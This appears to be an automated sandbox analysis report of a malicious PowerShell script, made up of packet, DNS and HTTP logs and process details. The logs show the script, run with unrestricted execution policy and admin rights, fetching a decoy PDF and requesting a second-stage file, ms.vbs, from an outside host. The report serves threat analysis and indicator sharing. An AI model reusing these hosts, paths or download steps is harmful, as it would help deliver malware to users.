Dec 19, 2024 12:51:21.359762907 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.373040915 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.373060942 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.373132944 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.373142958 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.373187065 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.386499882 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.386517048 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.386605024 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.386612892 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.386651039 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.485505104 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.485539913 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.485622883 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.485635042 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.485662937 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.485678911 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.495570898 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.495589018 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.495656013 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.495662928 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.495704889 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.504982948 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.504998922 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.505053043 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.505058050 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.505099058 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.513878107 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.513895035 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.513942003 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.513948917 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.513971090 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.513984919 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.522780895 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.522800922 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.522856951 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.522864103 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.522891045 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.522919893 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.531169891 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.531186104 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.531234980 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.531244040 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.531275988 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.540229082 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.540245056 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.540311098 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.540317059 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.540355921 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.548007965 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.548038006 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.548065901 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.548074007 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.548095942 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.548111916 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.677855968 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.677875996 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.677993059 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.678006887 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.678046942 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.684251070 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.684278011 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.684357882 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.684369087 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.684408903 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.691332102 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.691359043 CET  443          49704      107.161.23.150  192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.691440105 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.691447020 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.691483974 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.697921991 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.697969913 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.698013067 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.698021889 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.698051929 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.698067904 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704850912 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704895020 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704941034 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704948902 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704974890 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704992056 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711673021 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711747885 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711767912 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711776018 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711802959 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711817980 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.718460083 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718522072 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718669891 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.718681097 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718724966 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725642920 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725687981 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725722075 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725728989 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725763083 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725774050 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871762037 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871793032 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871848106 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871870995 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871902943 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871918917 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876473904 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876497030 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876557112 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876565933 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876597881 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876611948 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883462906 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883510113 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883549929 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883557081 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883595943 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883620977 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.889801025 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889846087 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889873981 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.889882088 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889924049 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.896915913 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.896962881 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.896990061 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.897002935 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.897027016 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.897058010 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903548956 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903568983 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903618097 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903626919 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903662920 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903675079 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.910448074 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910470963 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910526991 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.910537004 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910564899 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.917757034 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917818069 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917830944 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.917840958 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917879105 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062160015 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062206030 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062246084 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062256098 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062376976 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062376976 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068458080 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068487883 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068528891 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068536043 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068567038 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068582058 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.075514078 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075547934 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075586081 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.075592041 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075629950 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081828117 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081856966 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081897020 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081904888 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081939936 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081948996 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088792086 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088821888 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088865042 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088872910 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088901997 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088924885 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.095637083 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095662117 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095722914 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.095730066 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095771074 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102580070 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102611065 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102657080 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102663040 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102685928 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102703094 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109735012 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109765053 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109819889 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109827995 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109846115 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109873056 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.253968954 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254002094 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254131079 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.254154921 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254455090 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.260477066 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260498047 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260560036 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.260576963 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260626078 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261703014 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261759996 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261765957 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261781931 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261805058 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261831999 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.264470100 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.512603045 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.632304907 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.632375002 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.632498026 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.751992941 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:24.167141914 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:24.212836027 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:25.176598072 CET4970580192.168.2.5203.175.174.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:51:18.669123888 CET | 58066 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:51:18.807569981 CET | 53 | 58066 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 12:51:22.374206066 CET | 49263 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:51:22.511921883 CET | 53 | 49263 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 12:51:31.767777920 CET | 53828 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:51:45.760885954 CET | 61260 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:52:01.779092073 CET | 50077 | 53 | 192.168.2.5 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:51:18.669123888 CET | 192.168.2.5 | 1.1.1.1 | 0x182c | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:22.374206066 CET | 192.168.2.5 | 1.1.1.1 | 0x6952 | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:31.767777920 CET | 192.168.2.5 | 1.1.1.1 | 0x4aab | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:45.760885954 CET | 192.168.2.5 | 1.1.1.1 | 0x8bbf | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:52:01.779092073 CET | 192.168.2.5 | 1.1.1.1 | 0x61d4 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:51:18.807569981 CET | 1.1.1.1 | 192.168.2.5 | 0x182c | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:18.807569981 CET | 1.1.1.1 | 192.168.2.5 | 0x182c | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:22.511921883 CET | 1.1.1.1 | 192.168.2.5 | 0x6952 | No error (0) | www.bluemaxxlaser.com | | 203.175.174.69 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.20 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.212.68 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:28.983484030 CET | 1.1.1.1 | 192.168.2.5 | 0x531b | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:31.905637026 CET | 1.1.1.1 | 192.168.2.5 | 0x4aab | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:45.981415033 CET | 1.1.1.1 | 192.168.2.5 | 0x8bbf | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:52:01.917258024 CET | 1.1.1.1 | 192.168.2.5 | 0x61d4 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:52:33.722270012 CET | 1.1.1.1 | 192.168.2.5 | 0x6ab9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:52:33.722270012 CET | 1.1.1.1 | 192.168.2.5 | 0x6ab9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                              • www.astenterprises.com.pk
                                                                                              • www.bluemaxxlaser.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 203.175.174.69 | 80 | 2696 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 12:51:22.632498026 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
                                                                                              Host: www.bluemaxxlaser.com
                                                                                              Connection: Keep-Alive
Dec 19, 2024 12:51:24.167141914 CET | 516 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 11:51:23 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 107.161.23.150 | 443 | 2696 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:51:20 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                              Host: www.astenterprises.com.pk
                                                                                              Connection: Keep-Alive
2024-12-19 11:51:20 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              content-type: application/pdf
                                                                                              last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                              accept-ranges: bytes
                                                                                              content-length: 871324
                                                                                              date: Thu, 19 Dec 2024 11:51:20 GMT
                                                                                              server: LiteSpeed


                                                                                              Target ID:0
                                                                                              Start time:06:51:08
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1"
                                                                                              Imagebase:0x7ff7be880000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:06:51:08
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff6d64d0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:06:51:10
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
